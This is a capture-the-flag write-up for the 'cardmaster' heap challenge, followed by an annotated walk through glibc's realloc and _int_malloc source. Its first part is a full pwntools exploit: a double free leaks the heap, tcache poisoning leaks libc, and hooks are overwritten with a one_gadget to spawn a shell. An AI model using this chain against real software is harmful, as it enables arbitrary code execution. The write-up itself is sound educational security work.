Wangding Cup Semifinals
2024-12-20 22:30:24 # wp

cardmaster

Writeup from during the contest

Took me an hour past the deadline to solve... my thinking was too inflexible when it came time to switch approaches, and I wasn't familiar enough with realloc.
Honestly, though, this challenge was solved purely by guessing through dynamic debugging.
The main idea is to use a double free to allocate the main chunk (the chunk that stores the output-function pointer and the address of the string chunk), then overwrite the pointers inside it to leak a libc address. The heap address can simply be leaked during the double free. Most of my time was spent stuck on the libc leak.
With the libc address in hand, the next step was to overwrite the output-function pointer. I spent a long time failing to construct another double free the way I did before, but eventually worked it out: use realloc to drop a 0x30 chunk into the tcache bin, then call the init function to allocate two 0x30 chunks. During edit, execution then enters the malloc branch, which allocates the 0x30 chunk back out, and its address is controllable. From there it's a matter of attacking __malloc_hook. None of the three one_gadget constraints could be satisfied directly, but chaining realloc and malloc together makes it work: set __malloc_hook to realloc+offset and __realloc_hook to the one_gadget, so realloc's prologue shifts the stack just enough to satisfy the gadget's constraints.

from pwn import *

io = process("./pwn")
#io = remote("83.43.93.13",15000)
elf = ELF("./pwn")
context.arch = "amd64"
context.log_level = "debug"
context.terminal = ['tmux','splitw','-h']
libc = ELF("libc.so.6")

def debug():
    gdb.attach(io)
    pause()

def init_card():
    io.recvuntil(">> ")
    io.sendline("1")

def edit_card(count, number, level, payload):
    io.recvuntil(">> ")
    io.sendline("2")
    io.recvuntil("suit count:")
    io.sendline(str(count))
    io.recvuntil("digit range 1 - ?")
    io.sendline(str(number))
    io.recvuntil("randomize level:")
    io.sendline(str(level))
    io.recvuntil("new suite set:")
    io.send(payload)

def shuffle_card():
    io.recvuntil(">> ")
    io.sendline("4")

def show_card():
    io.recvuntil(">> ")
    io.sendline("5")

def get_info():
    io.recvuntil(">> ")
    io.sendline("3")

# Double free: the payload b"2\n" is read back as the next menu choice,
# so edit is re-entered and the same chunk gets freed twice.
# gdb.attach(io,'b *$rebase(0x1258)')
edit_card(0, 1, 100, b"2\n")
io.recvuntil("suit count:")
io.sendline(str(0))
io.recvuntil("digit range 1 - ?")
io.sendline(str(1))
io.recvuntil("randomize level:")
io.sendline(str(100))
io.recvuntil(">> ")
io.sendline("2")
# gdb.attach(io,'b *$rebase(0x1258)')
io.recvuntil("suit count:")
io.sendline(str(0))
io.recvuntil("digit range 1 - ?")
io.sendline(str(1))
io.recvuntil("randomize level:")
io.sendline(str(100))
# pause()

# The doubly freed chunk leaks a heap pointer through its fd field.
get_info()
io.recvuntil("suit chara set:")
heap_addr = u64(io.recv(6).ljust(8, b'\x00'))
success("heap_addr :" + hex(heap_addr))

# Poison the freed chunk's fd so the next allocations land on the main chunk
# (the chunk holding the output-function pointer and the string pointer).
edit_card(300, 0, 100, b"\xa0")
# gdb.attach(io,'b *$rebase(0x137B)')
edit_card(11, 0, 100, b"\xa0")
# pause()
edit_card(11, 0, 100, p64(heap_addr - 0x3c8))
edit_card(1, 1, 100, b"\xa0")
# gdb.attach(io,'b *$rebase(0x11FC)')
edit_card(1, 1, 100, b"a")
# pause()
init_card()
# Redirect the stored string pointer at a heap location holding a main_arena
# pointer, so get_info() prints a libc address.
# gdb.attach(io,'b *$rebase(0x11FC)')
edit_card(2, 0, 100, p64(heap_addr - 0x640 + 0xa30))
# pause()
# gdb.attach(io,'b *$rebase(0xB10)')
get_info()
io.recvuntil("suit chara set:")
libc_addr = u64(io.recv(6).ljust(8, b'\x00')) - 0x3ebca0
success("libc_addr :" + hex(libc_addr))
# pause()

# Use realloc's shrink/grow behavior to drop a 0x30 chunk into the tcache bin.
edit_card(8, 0, 100, b"a")
edit_card(12, 0, 100, b"a")
edit_card(1, 0, 100, b"a")
edit_card(8, 0, 100, b"a")
edit_card(1, 0, 100, b"a")

malloc_hook = libc_addr + libc.sym['__malloc_hook']
realloc_hook = libc_addr + libc.sym['__realloc_hook']
onegadget_addr = libc_addr + 0x10a38c

# Tcache poisoning: point the freed chunk's fd just in front of __realloc_hook.
# gdb.attach(io,'b *$rebase(0x137B)')
edit_card(8, 0, 100, p64(realloc_hook - 0x10))
# pause()
# gdb.attach(io,'b *$rebase(0xC1A)')
init_card()
# pause()
# __realloc_hook = one_gadget, __malloc_hook = realloc+6: malloc enters realloc's
# prologue, which shifts the stack enough to satisfy the one_gadget constraints.
# gdb.attach(io,'b *$rebase(0x137B)')
realloc_addr = libc_addr + libc.sym['realloc']
edit_card(8, 0, 100, p64(0) * 2 + p64(onegadget_addr) + p64(realloc_addr + 0x6))
# pause()

# gdb.attach(io,'b *$rebase(0xC1A)')
init_card()
# pause()
io.interactive()

Postscript: a close look at realloc

I took some time to study realloc specifically and found plenty of behavior I didn't know about.
realloc is used to resize an existing allocation: it adjusts memory that has already been allocated.

void *realloc(void *ptr, size_t size);

ptr points to the chunk to be reallocated, and size is the new requested size.
Let's look at how realloc behaves in the normal case.

//gcc -o test -g ./test.c
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>

void init(){
    setvbuf(stdout, 0, 0, 0);
    setvbuf(stdin, 0, 2, 0);
}

int main() {
    init();
    char *ptr = malloc(0x30);
    realloc(ptr, 0x10);
}

The state of ptr before the realloc call is shown below.
[screenshot: heap state before the realloc]
After the call, the original chunk has been re-sized down to 0x20, and the remaining 0x20 is freed into a bin.
[screenshot: heap state after the realloc]
Note: although the requested size is 0x10, you might expect that carving 0x10 out of a 0x30 chunk leaves 0x20 of usable space. In fact both chunks end up with 0x10 of usable space each, because each chunk needs its own header; this is what keeps the existing heap structure intact.
Now change realloc's ptr argument to 0 and see what happens.
[screenshot: realloc(NULL, size)]
Since there is no chunk to reallocate, a brand-new chunk is simply allocated: realloc(NULL, size) behaves like malloc(size).
If instead realloc's size argument is changed to 0:
[screenshot: realloc(ptr, 0)]
the chunk is simply freed into a bin.
What if size is larger than the chunk's current size?
[screenshot: in-place growth]
Then the chunk's size is simply extended in place.
And what if a chunk2 is placed right behind chunk1 to pin its size, so chunk1 cannot grow toward higher addresses?
[screenshot: growth blocked by an in-use neighbor]
As shown, the fallback is to free chunk1 outright and allocate a fresh chunk that satisfies the requested size.
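These cases can also be reproduced without a debugger. Below is a minimal consolidated sketch of the behaviors above (my own test program, not part of the challenge; malloc_usable_size is a glibc extension used here only to make the split visible):

#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>   /* malloc_usable_size, a glibc extension */

int main(void) {
    /* shrink: the chunk is split and the tail is freed into a bin */
    char *p = malloc(0x30);
    printf("usable before shrink: %#zx\n", malloc_usable_size(p));
    p = realloc(p, 0x10);
    printf("usable after shrink:  %#zx\n", malloc_usable_size(p));

    /* NULL pointer: realloc degenerates to malloc */
    char *q = realloc(NULL, 0x20);
    printf("realloc(NULL, 0x20) = %p\n", (void *) q);

    /* size 0: realloc degenerates to free and returns NULL */
    q = realloc(q, 0);
    printf("realloc(q, 0)       = %p\n", (void *) q);

    /* growth blocked by a neighbor: the old chunk is freed, a new one returned */
    char *a = malloc(0x30);
    char *b = malloc(0x10);          /* pins a so it cannot grow in place */
    char *a2 = realloc(a, 0x80);
    printf("a = %p, realloc'd to %p (b = %p)\n", (void *) a, (void *) a2, (void *) b);
    return 0;
}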

//gcc -o test -g ./test.c
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>

void init(){
    setvbuf(stdout, 0, 0, 0);
    setvbuf(stdin, 0, 2, 0);
}

int main() {
    init();
    char *ptr = malloc(0x30);
    char *ptr1 = malloc(0x30);
    char *ptr2 = malloc(0x10);
    free(ptr1);
    realloc(ptr, 0x30);
}

My guess was that realloc's reallocation logic is free-then-malloc, so here a 0x30-sized chunk is freed first and then realloc is called, to see which chunk the reallocated pointer ends up pointing to.
[screenshot: bins after free(ptr1)]
It still points at chunk0.
[screenshot: ptr after the realloc]
Not quite what I expected, so let's look at the comments above realloc.
[screenshot: comment block above realloc in the glibc source]
According to the source comments, when the new size is larger than the old size, realloc performs a malloc-copy-free sequence: allocate a chunk big enough, move the data over, then free the original chunk.
But the experiments above showed that even when the tcache bin holds a chunk of a suitable size, realloc does not allocate it.
The same happens if the tcache bin is replaced by the unsorted bin.
So we have to go through realloc's source code to see the detailed logic.
(The source below is glibc 2.35; the inline comments are my notes.)

void *
__libc_realloc (void *oldmem, size_t bytes)
{
  mstate ar_ptr;
  INTERNAL_SIZE_T nb;         /* padded request size */

  void *newp;                 /* chunk to return */

  if (!__malloc_initialized)  /* check whether the heap is initialized */
    ptmalloc_init ();

#if REALLOC_ZERO_BYTES_FREES  /* defaults to 1: when bytes is 0 and the pointer is non-NULL, realloc acts as free */
  if (bytes == 0 && oldmem != NULL)
    {
      __libc_free (oldmem); return 0;
    }
#endif

  /* realloc of null is supposed to be same as malloc */
  if (oldmem == 0)            /* a NULL pointer makes realloc act as malloc */
    return __libc_malloc (bytes);

  /* Perform a quick check to ensure that the pointer's tag matches the
     memory's tag.  */
  if (__glibc_unlikely (mtag_enabled))
    *(volatile char*) oldmem;

  /* chunk corresponding to oldmem */   /* get the chunk pointer and its size */
  const mchunkptr oldp = mem2chunk (oldmem);
  /* its size */
  const INTERNAL_SIZE_T oldsize = chunksize (oldp);

  if (chunk_is_mmapped (oldp))  /* was the chunk allocated via mmap? ordinary malloc memory comes from brk */
    ar_ptr = NULL;
  else
    {
      MAYBE_INIT_TCACHE ();
      ar_ptr = arena_for_chunk (oldp);
    }

  /* Little security check which won't hurt performance: the allocator
     never wrapps around at the end of the address space.  Therefore
     we can exclude some size values which might appear here by
     accident or by "design" from some intruder.  */
  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)  /* check for size wrap-around and pointer misalignment */
       || __builtin_expect (misaligned_chunk (oldp), 0)))
    malloc_printerr ("realloc(): invalid pointer");

  if (!checked_request2size (bytes, &nb))  /* validate the requested size */
    {
      __set_errno (ENOMEM);
      return NULL;
    }

  if (chunk_is_mmapped (oldp))
    {
      void *newmem;

#if HAVE_MREMAP  /* 0 in the generic code but defined to 1 on Linux; lets realloc resize large mmap'd chunks with mremap */
      newp = mremap_chunk (oldp, nb);
      if (newp)
	{
	  void *newmem = chunk2mem_tag (newp);
	  /* Give the new block a different tag.  This helps to ensure
	     that stale handles to the previous mapping are not
	     reused.  There's a performance hit for both us and the
	     caller for doing this, so we might want to
	     reconsider.  */
	  return tag_new_usable (newmem);
	}
#endif
      /* Note the extra SIZE_SZ overhead. */
      if (oldsize - SIZE_SZ >= nb)  /* SIZE_SZ is the chunk metadata overhead; if the old chunk is big enough, return it unchanged */
        return oldmem;  /* do nothing */

      /* Must alloc, copy, free. */
      newmem = __libc_malloc (bytes);  /* the key logic: if the old chunk is too small, call malloc(bytes) and copy the old contents over */
      if (newmem == 0)
        return 0;  /* propagate failure */

      memcpy (newmem, oldmem, oldsize - CHUNK_HDR_SZ);
      munmap_chunk (oldp);  /* free the old chunk */
      return newmem;
    }

  if (SINGLE_THREAD_P)  /* single-threaded reallocation */
    {
      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
              ar_ptr == arena_for_chunk (mem2chunk (newp)));

      return newp;
    }

  /* multi-threaded */
  __libc_lock_lock (ar_ptr->mutex);

  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);

  __libc_lock_unlock (ar_ptr->mutex);
  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
          ar_ptr == arena_for_chunk (mem2chunk (newp)));

  /* fallback when allocation fails */
  if (newp == NULL)
    {
      /* Try harder to allocate memory in other arenas.  */
      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
      newp = __libc_malloc (bytes);
      if (newp != NULL)
        {
          size_t sz = memsize (oldp);
          memcpy (newp, oldmem, sz);
          (void) tag_region (chunk2mem (oldp), sz);
          _int_free (ar_ptr, oldp, 0);
        }
    }

  return newp;
}

The part to focus on is the malloc-copy-free flow, which triggers when oldp's size cannot satisfy bytes. Our earlier experiment never hit it, though, because this mcf flow inside __libc_realloc exists only in the if (chunk_is_mmapped (oldp)) branch, i.e. it applies only to chunks allocated by mmap. So the next step is to analyze _int_realloc.
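As a quick sanity check of that branch (my own sketch, not from the challenge): a request above the mmap threshold (128 KiB by default) is served by mmap, so growing such a chunk really does go through the branch above, via mremap on Linux, or malloc-copy-free where mremap is unavailable:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    char *p = malloc(0x200000);       /* > mmap threshold: chunk_is_mmapped is true */
    strcpy(p, "payload");
    char *q = realloc(p, 0x400000);   /* resized via mremap (or malloc-copy-free) */
    printf("%p -> %p, data survived: %s\n", (void *) p, (void *) q, q);
    free(q);
    return 0;
}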

_int_realloc (mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
              INTERNAL_SIZE_T nb)
{
  mchunkptr newp;               /* chunk to return */
  INTERNAL_SIZE_T newsize;      /* its size */
  void *newmem;                 /* corresponding user mem */

  mchunkptr next;               /* next contiguous chunk after oldp */

  mchunkptr remainder;          /* extra space at end of newp */
  unsigned long remainder_size; /* its size */

  /* oldmem size */
  if (__builtin_expect (chunksize_nomask (oldp) <= CHUNK_HDR_SZ, 0)  /* a size no larger than the chunk header is clearly bogus */
      || __builtin_expect (oldsize >= av->system_mem, 0))            /* oldsize must be below the total memory obtained from the system */
    malloc_printerr ("realloc(): invalid old size");

  check_inuse_chunk (av, oldp);  /* the chunk at oldp must be in use */

  /* All callers already filter out mmap'ed chunks.  */
  assert (!chunk_is_mmapped (oldp));  /* mmap'd chunks were filtered out by the callers; assert that here */

  next = chunk_at_offset (oldp, oldsize);       /* the next contiguous chunk */
  INTERNAL_SIZE_T nextsize = chunksize (next);  /* and its size */
  if (__builtin_expect (chunksize_nomask (next) <= CHUNK_HDR_SZ, 0)  /* the next chunk's size must also be sane */
      || __builtin_expect (nextsize >= av->system_mem, 0))           /* and below the total memory obtained from the system */
    malloc_printerr ("realloc(): invalid next size");

  if ((unsigned long) (oldsize) >= (unsigned long) (nb))  /* is oldsize already big enough? */
    {
      /* already big enough; split below */
      newp = oldp;   /* no new allocation: oldp will be split instead */
      newsize = oldsize;
    }

  else
    {
      /* Try to expand forward into top */
      if (next == av->top &&   /* if the next chunk is the top chunk, extend oldp into it */
          (unsigned long) (newsize = oldsize + nextsize) >=
          (unsigned long) (nb + MINSIZE))
        {
          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
          av->top = chunk_at_offset (oldp, nb);
          set_head (av->top, (newsize - nb) | PREV_INUSE);
          check_inuse_chunk (av, oldp);
          return tag_new_usable (chunk2mem (oldp));
        }

      /* Try to expand forward into next chunk; split off remainder below */
      else if (next != av->top &&   /* if the next chunk is free and oldsize + nextsize covers nb, merge oldp with it, then split */
               !inuse (next) &&
               (unsigned long) (newsize = oldsize + nextsize) >=
               (unsigned long) (nb))
        {
          newp = oldp;
          unlink_chunk (av, next);
        }

      /* allocate, copy, free */
      else   /* none of the special cases apply: fall back to malloc-copy-free */
        {
          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
          if (newmem == 0)
            return 0; /* propagate failure */

          newp = mem2chunk (newmem);
          newsize = chunksize (newp);

          /*
             Avoid copy if newp is next chunk after oldp.
           */
          if (newp == next)   /* puzzling at first glance: if newp is the chunk right after oldp, count it as merging oldp with next; normally that case was already handled above */
            {
              newsize += oldsize;
              newp = oldp;
            }
          else
            {
              void *oldmem = chunk2mem (oldp);
              size_t sz = memsize (oldp);
              (void) tag_region (oldmem, sz);     /* re-tag the old region */
              newmem = tag_new_usable (newmem);   /* mark the new region usable */
              memcpy (newmem, oldmem, sz);
              _int_free (av, oldp, 1);
              check_inuse_chunk (av, newp);
              return newmem;
            }
        }
    }

  /* If possible, free extra space in old or extended chunk */

  assert ((unsigned long) (newsize) >= (unsigned long) (nb));  /* newsize must cover nb; now check for surplus space */

  remainder_size = newsize - nb;

  if (remainder_size < MINSIZE)   /* not enough extra to split off */
    {   /* surplus below the minimum chunk size: just set the header bits and return */
      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
      set_inuse_bit_at_offset (newp, newsize);
    }
  else   /* split remainder */
    {   /* otherwise split the surplus off as a new chunk */
      remainder = chunk_at_offset (newp, nb);
      /* Clear any user-space tags before writing the header.  */
      remainder = tag_region (remainder, remainder_size);
      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
      set_head (remainder, remainder_size | PREV_INUSE |
                (av != &main_arena ? NON_MAIN_ARENA : 0));
      /* Mark remainder as inuse so free() won't complain */
      set_inuse_bit_at_offset (remainder, remainder_size);
      _int_free (av, remainder, 1);
    }

  check_inuse_chunk (av, newp);
  return tag_new_usable (chunk2mem (newp));
}

_int_realloc's main logic runs through the if/else chain below, and the else branch is the one worth a closer look.

else   /* none of the special cases apply: fall back to malloc-copy-free */
  {
    newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
    if (newmem == 0)
      return 0; /* propagate failure */

    newp = mem2chunk (newmem);
    newsize = chunksize (newp);

    /*
       Avoid copy if newp is next chunk after oldp.
     */
    if (newp == next)   /* puzzling at first glance: if newp is the chunk right after oldp, count it as merging oldp with next; normally that case was already handled above */
      {
        newsize += oldsize;
        newp = oldp;
      }
    else
      {
        void *oldmem = chunk2mem (oldp);
        size_t sz = memsize (oldp);
        (void) tag_region (oldmem, sz);     /* re-tag the old region */
        newmem = tag_new_usable (newmem);   /* mark the new region usable */
        memcpy (newmem, oldmem, sz);
        _int_free (av, oldp, 1);
        check_inuse_chunk (av, newp);
        return newmem;
      }
  }

It starts by calling _int_malloc. (Note that this is _int_malloc: just like realloc, malloc comes in an _int_ and a __libc_ flavor, and what a program normally reaches is __libc_malloc. This is exactly why we saw earlier that a suitable chunk sitting in the tcache bin never got allocated; which branch gets bypassed, and how to deal with it, needs further analysis below.)
Next comes a check testing whether new_chunk is next_chunk. But whether next_chunk could be used to extend old_chunk was already decided separately before this point; this if handles the corner case where next_chunk becomes available only after _int_malloc runs. What exact scenario that guards against, I can't picture; hopefully reading _int_malloc will give an answer.
Then comes the standard copy-free. Since free never showed any notable surprises during the experiments, I'll skip _int_free's source for now and look at how _int_malloc differs from __libc_malloc.
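Spoiling the answer slightly: the reason the tcache chunk is never taken is that the tcache fast path sits at the very top of __libc_malloc, which _int_realloc bypasses by calling _int_malloc directly. From memory of the glibc 2.35 source (treat this as an approximate, abridged excerpt rather than an exact quote):

void *
__libc_malloc (size_t bytes)
{
  mstate ar_ptr;
  void *victim;
  ...
#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes;
  if (!checked_request2size (bytes, &tbytes))
    {
      __set_errno (ENOMEM);
      return NULL;
    }
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  if (tc_idx < mp_.tcache_bins
      && tcache
      && tcache->counts[tc_idx] > 0)
    {
      victim = tcache_get (tc_idx);   /* the lookup that realloc's path never reaches */
      return tag_new_usable (victim);
    }
#endif
  ...
}

So realloc's malloc-copy-free path can draw from the fastbins, smallbins, largebins, unsorted bin, or the top chunk, but it only touches pre-existing tcache chunks indirectly, through the stashing logic inside _int_malloc.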

static void *
_int_malloc (mstate av, size_t bytes)
{
  INTERNAL_SIZE_T nb;               /* normalized request size */
  unsigned int idx;                 /* associated bin index */
  mbinptr bin;                      /* associated bin */

  mchunkptr victim;                 /* inspected/selected chunk */
  INTERNAL_SIZE_T size;             /* its size */
  int victim_index;                 /* its bin index */

  mchunkptr remainder;              /* remainder from a split */
  unsigned long remainder_size;     /* its size */

  unsigned int block;               /* bit map traverser */
  unsigned int bit;                 /* bit map traverser */
  unsigned int map;                 /* current word of binmap */

  mchunkptr fwd;                    /* misc temp for linking */
  mchunkptr bck;                    /* misc temp for linking */

#if USE_TCACHE
  size_t tcache_unsorted_count;     /* count of unsorted chunks processed */
#endif

  /*
     Convert request size to internal form by adding SIZE_SZ bytes
     overhead plus possibly more to obtain necessary alignment and/or
     to obtain a size of at least MINSIZE, the smallest allocatable
     size. Also, checked_request2size returns false for request sizes
     that are so large that they wrap around zero when padded and
     aligned.
   */

  if (!checked_request2size (bytes, &nb))   /* add the chunk header overhead to the requested size */
    {
      __set_errno (ENOMEM);
      return NULL;
    }

  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
     mmap.  */
  if (__glibc_unlikely (av == NULL))   /* no usable arena: let sysmalloc allocate via mmap */
    {
      void *p = sysmalloc (nb, av);
      if (p != NULL)
        alloc_perturb (p, bytes);
      return p;
    }

  /*
     If the size qualifies as a fastbin, first check corresponding bin.
     This code is safe to execute even if av is not yet initialized, so we
     can try it without checking, which saves some time on this fast path.
   */

  /* pop a chunk from the fastbin list */
#define REMOVE_FB(fb, victim, pp)                                       \
  do                                                                    \
    {                                                                   \
      victim = pp;                                                      \
      if (victim == NULL)                                               \
        break;                                                          \
      pp = REVEAL_PTR (victim->fd);                                     \
      /* sanity check: fd must be NULL or an aligned chunk pointer */   \
      if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp)))       \
        malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \
    }                                                                   \
  while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim))   \
         != victim);

  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))   /* is the request within fastbin range? */
    {
      idx = fastbin_index (nb);
      mfastbinptr *fb = &fastbin (av, idx);   /* head of the fastbin list */
      mchunkptr pp;
      victim = *fb;

      if (victim != NULL)
        {
          if (__glibc_unlikely (misaligned_chunk (victim)))
            malloc_printerr ("malloc(): unaligned fastbin chunk detected 2");

          if (SINGLE_THREAD_P)
            *fb = REVEAL_PTR (victim->fd);
          else
            REMOVE_FB (fb, pp, victim);   /* multi-threaded pop from the fastbin */
          if (__glibc_likely (victim != NULL))   /* sanity check */
            {
              size_t victim_idx = fastbin_index (chunksize (victim));
              if (__builtin_expect (victim_idx != idx, 0))
                malloc_printerr ("malloc(): memory corruption (fast)");
              check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE
              /* the tcache stashing mechanism seen before: after taking a chunk
                 from the fastbin, any remaining free chunks in that list get
                 moved into the tcache bin */
              /* While we're here, if we see other chunks of the same size,
                 stash them in the tcache.  */
              size_t tc_idx = csize2tidx (nb);
              if (tcache && tc_idx < mp_.tcache_bins)
                {
                  mchunkptr tc_victim;

                  /* While bin not empty and tcache not full, copy chunks.  */
                  while (tcache->counts[tc_idx] < mp_.tcache_count   /* keep moving chunks while the tcache bin for this size has room */
                         && (tc_victim = *fb) != NULL)
                    {
                      if (__glibc_unlikely (misaligned_chunk (tc_victim)))
                        malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
                      if (SINGLE_THREAD_P)
                        *fb = REVEAL_PTR (tc_victim->fd);
                      else
                        {
                          REMOVE_FB (fb, pp, tc_victim);
                          if (__glibc_unlikely (tc_victim == NULL))
                            break;
                        }
                      tcache_put (tc_victim, tc_idx);
                    }
                }
#endif
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
            }
        }
    }

  /*
     If a small request, check regular bin.  Since these "smallbins"
     hold one size each, no searching within bins is necessary.
     (For a large request, we need to wait until unsorted chunks are
     processed to find best fit. But for small ones, fits are exact
     anyway, so we can check now, which is faster.)
   */
  /* check the smallbins next: like the tcache bins, each smallbin serves a
     single size, so lookup is fast */
  if (in_smallbin_range (nb))
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);   /* head of the smallbin list */

      if ((victim = last (bin)) != bin)
        {
          bck = victim->bk;   /* the chunk before the last chunk in the list */
          if (__glibc_unlikely (bck->fd != victim))   /* sanity check: if bck's fd is not victim, the list is corrupted */
            malloc_printerr ("malloc(): smallbin double linked list corrupted");
          set_inuse_bit_at_offset (victim, nb);
          bin->bk = bck;   /* take the last chunk in the list for use, then relink the list */
          bck->fd = bin;

          if (av != &main_arena)   /* if this arena is not main_arena, mark the chunk non-main-arena */
            set_non_main_arena (victim);
          check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
          /* as in the fastbin path: if the smallbin list still holds free
             chunks of this size, the size fits the tcache range, and the
             tcache bin has room, stash them all */
          /* While we're here, if we see other chunks of the same size,
             stash them in the tcache.  */
          size_t tc_idx = csize2tidx (nb);
          if (tcache && tc_idx < mp_.tcache_bins)
            {
              mchunkptr tc_victim;

              /* While bin not empty and tcache not full, copy chunks over.  */
              while (tcache->counts[tc_idx] < mp_.tcache_count
                     && (tc_victim = last (bin)) != bin)
                {
                  if (tc_victim != 0)
                    {
                      bck = tc_victim->bk;
                      set_inuse_bit_at_offset (tc_victim, nb);
                      if (av != &main_arena)
                        set_non_main_arena (tc_victim);
                      bin->bk = bck;
                      bck->fd = bin;

                      tcache_put (tc_victim, tc_idx);
                    }
                }
            }
#endif
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }

  /*
     If this is a large request, consolidate fastbins before continuing.
     While it might look excessive to kill all fastbins before
     even seeing if there is space available, this avoids
     fragmentation problems normally associated with fastbins.
     Also, in practice, programs tend to have runs of either small or
     large requests, but less often mixtures, so consolidation is not
     invoked all that often in most programs. And the programs that
     it is called frequently in otherwise tend to fragment.
   */

  else
    {   /* a largebin-range request triggers malloc_consolidate, which merges fastbin chunks */
      idx = largebin_index (nb);
      if (atomic_load_relaxed (&av->have_fastchunks))
        malloc_consolidate (av);
    }

  /*
     Process recently freed or remaindered chunks, taking one only if
     it is exact fit, or, if this a small request, the chunk is remainder from
     the most recent non-exact fit.  Place other traversed chunks in
     bins.  Note that this step is the only place in any routine where
     chunks are placed in bins.

     The outer loop here is needed because we might not realize until
     near the end of malloc that we should have consolidated, so must
     do so and retry. This happens at most once, and only when we would
     otherwise need to expand memory to service a "small" request.
   */

#if USE_TCACHE
  INTERNAL_SIZE_T tcache_nb = 0;
  size_t tc_idx = csize2tidx (nb);
  if (tcache && tc_idx < mp_.tcache_bins)   /* is the request within tcache range? */
    tcache_nb = nb;
  int return_cached = 0;

  tcache_unsorted_count = 0;
#endif

  for (;; )
    {
      int iters = 0;
      /* if the list head's bk points back to the head itself, the unsorted bin
         holds no free chunks and the while loop is skipped */
      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
        {
          bck = victim->bk;   /* the chunk before victim in the list */
          size = chunksize (victim);
          mchunkptr next = chunk_at_offset (victim, size);   /* the chunk physically adjacent after victim */
          if (__glibc_unlikely (size <= CHUNK_HDR_SZ)   /* sanity check on victim's size */
              || __glibc_unlikely (size > av->system_mem))
            malloc_printerr ("malloc(): invalid size (unsorted)");
          if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ)   /* the next chunk's size must be sane too */
              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
            malloc_printerr ("malloc(): invalid next size (unsorted)");
          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))   /* next chunk's prev_size must match victim's size */
            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
          if (__glibc_unlikely (bck->fd != victim)   /* linked-list integrity check */
              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
            malloc_printerr ("malloc(): unsorted double linked list corrupted");
          if (__glibc_unlikely (prev_inuse (next)))   /* next chunk's prev_inuse bit must be 0 */
            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

          /*
             If a small request, try to use last remainder if it is the
             only chunk in unsorted bin.  This helps promote locality for
             runs of consecutive small requests. This is the only
             exception to best-fit, and applies only when there is
             no exact fit for a small chunk.
           */

          if (in_smallbin_range (nb) &&   /* small request, and victim's size exceeds the request */
              bck == unsorted_chunks (av) &&   /* note: this compares bck against the corresponding list head in main_arena; if the chunk entered the unsorted bin by filling up the tcache first, an extra small allocation is needed before this branch can trigger, because unsorted_chunks(av) is 0 on the very first chunk request */
              victim == av->last_remainder &&
              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
            {
              /* split and reattach remainder */
              remainder_size = size - nb;   /* carve the request out of the remaining space */
              remainder = chunk_at_offset (victim, nb);
              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
              av->last_remainder = remainder;
              remainder->bk = remainder->fd = unsorted_chunks (av);
              if (!in_smallbin_range (remainder_size))
                {
                  remainder->fd_nextsize = NULL;
                  remainder->bk_nextsize = NULL;
                }

              set_head (victim, nb | PREV_INUSE |
                        (av != &main_arena ? NON_MAIN_ARENA : 0));
              set_head (remainder, remainder_size | PREV_INUSE);
              set_foot (remainder, remainder_size);

              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
            }

          /* remove from unsorted list */
          if (__glibc_unlikely (bck->fd != victim))   /* sanity check */
            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);

          /* Take now instead of binning if exact fit */

          if (size == nb)   /* exact fit: the requested size equals this chunk's size */
            {
              set_inuse_bit_at_offset (victim, size);
              if (av != &main_arena)
                set_non_main_arena (victim);
#if USE_TCACHE
              /* Fill cache first, return to user only if cache fills.
                 We may return one of these chunks later.  */
              if (tcache_nb   /* with tcache enabled, stash the exact fit into the tcache first */
                  && tcache->counts[tc_idx] < mp_.tcache_count)
                {
                  tcache_put (victim, tc_idx);
                  return_cached = 1;
                  continue;
                }
              else
                {
#endif
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
#if USE_TCACHE
                }
#endif
            }

          /* place chunk in bin */

          if (in_smallbin_range (size))   /* decide by size whether the chunk goes into a smallbin or a largebin */
            {
              victim_index = smallbin_index (size);
              bck = bin_at (av, victim_index);
              fwd = bck->fd;
            }
          else
            {
              victim_index = largebin_index (size);
              bck = bin_at (av, victim_index);
